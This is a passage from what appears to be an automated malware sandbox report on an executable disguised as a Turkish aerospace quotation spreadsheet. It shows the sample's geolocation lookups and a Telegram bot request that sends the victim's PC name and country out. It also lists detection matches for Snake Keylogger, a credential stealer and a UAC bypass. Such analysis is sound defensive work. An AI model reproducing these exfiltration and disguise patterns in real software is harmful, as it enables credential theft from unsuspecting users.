                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97226
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhMJQn6%2BM0PIWAb16gLZf8rRTw3GFYfQeWG9pyc4GcVXitpx6pht1ofVKZiKUueecqfLwapodo%2FEhN9l9uREUtS1VQSi65DlC%2FKmuHDyvw%2FGO0U1QLQg2dShBlPl5BU26pRdtg8s"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f176fe659fdf5f6-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1494&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1933774&cwnd=175&unsent_bytes=0&cid=82b2497342d2889c&ts=468&x=0"
                                                                                        2024-12-13 16:47:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.849717104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:40 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-13 16:47:41 UTC875INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97230
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HYbIoxproKis56UH222qmYcGmf37oj9JbGl4r6z3bMQt4w%2BqMWcEM%2BoD2SAS8xKFU3uT4otVDXViVBU10IinzkJwxmmOkyRmLxE4DH8EEhdQFUykFI5JXtW%2FQX61RZWxCDuNdjzF"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f176ffaa92a0f69-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1474&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1909744&cwnd=250&unsent_bytes=0&cid=7e83fc78191ca7f7&ts=477&x=0"
                                                                                        2024-12-13 16:47:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.849719104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-13 16:47:44 UTC873INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:44 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97233
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2BK7KsxNAgxlWhnJdfKyog%2BiMHukCUOi0pdw9CwJqSmXgZdhE8UAo4SJGbIKnyDl1I5Y7Llg9cX41X408ylt2uDSandNe06b8mhFfcTIRjjLanSIKAejM1gGNPpRYccKgtsa6Ggy"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f17700f3e190c94-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1522&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1918528&cwnd=146&unsent_bytes=0&cid=481f96741f9dd507&ts=460&x=0"
                                                                                        2024-12-13 16:47:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.849721104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:47 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-13 16:47:48 UTC875INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97236
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zlg%2B0ww52yHJdnTJIzCZjKxtCwjaPfYowXfm7Whg0HheK0xokLru93yyKl6STekaPRCl6NaF9CXbc0HM8RUz4QlYpMBfeP6Z0gbcBD2%2BqHB5u9R0DzoGv85X%2FpZHAZjBPrsTJ4EW"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f1770242a89420b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2029&rtt_var=779&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1387832&cwnd=123&unsent_bytes=0&cid=521a718afcccda9c&ts=456&x=0"
                                                                                        2024-12-13 16:47:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.849723104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-13 16:47:51 UTC873INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97240
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lRxfavlOzYuQtzle%2Fek3K4LcMgxl2UAGpKlXZpPdUossKHukuO1w19qp44WWOuBt2LouRWrFS8%2FU44oHZxlkevSYjRPby2GYcaGayHmZVfeCfzSHSa1eCPWWyfXuF7UhO90luaj2"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f17703879074399-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1603&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1736028&cwnd=222&unsent_bytes=0&cid=f4eeb95622a5e9af&ts=457&x=0"
                                                                                        2024-12-13 16:47:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.849725104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-13 16:47:54 UTC877INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97243
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0oIVpfjydjyUuXoqhY1fpc3imKlaaGyotIr9V0vZVLxFNQ03GVwRC209Sw8LlSvJJ0%2B6E%2FO4xIFMwVABooJTtuZwORXNQz6oP6ZAjtD9Vh6qyXL6KXokSZT7%2BregIf5aUnpne0q"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f17704cdbd84239-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10041&min_rtt=1669&rtt_var=5741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1749550&cwnd=229&unsent_bytes=0&cid=80ac620716b940b7&ts=455&x=0"
                                                                                        2024-12-13 16:47:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.849727104.21.67.1524433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:57 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                        Host: reallyfreegeoip.org
                                                                                        2024-12-13 16:47:57 UTC875INHTTP/1.1 200 OK
                                                                                        Date: Fri, 13 Dec 2024 16:47:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=31536000
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 97246
                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GyXY%2F7J%2B92QsXMljESE8A3tYCmkojr1QVXm3yLmiPJgoiOWIc1VdYwKCwZvzCfY2Gw93Hsvakl0KN4mU3NPiSRAN21soMCpfX7kcT6u3yp%2B24EMr0QOn2LZl5KUFyNS4R1WmrgBP"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f177061098c4322-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1779402&cwnd=221&unsent_bytes=0&cid=6d3017f53d96a685&ts=457&x=0"
                                                                                        2024-12-13 16:47:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.849728149.154.167.2204433344C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-13 16:47:59 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-13 16:47:59 UTC344INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Fri, 13 Dec 2024 16:47:59 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 55
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-12-13 16:47:59 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:47:25
                                                                                        Start date:13/12/2024
                                                                                        Path:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                                                                                        Imagebase:0x2a1fab40000
                                                                                        File size:638'976 bytes
                                                                                        MD5 hash:037B9DC9D5BEE07E111173CBE87624B4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1669103886.000002A180361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:47:26
                                                                                        Start date:13/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:47:27
                                                                                        Start date:13/12/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                        Imagebase:0xcd0000
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4019025145.0000000003139000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:4
                                                                                        Start time:11:47:27
                                                                                        Start date:13/12/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        Wow64 process (32bit):
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                        Imagebase:
                                                                                        File size:65'440 bytes
                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:7
                                                                                        Start time:11:47:27
                                                                                        Start date:13/12/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028
                                                                                        Imagebase:0x7ff62db10000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:9.5%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:8
                                                                                          Total number of Limit Nodes:1
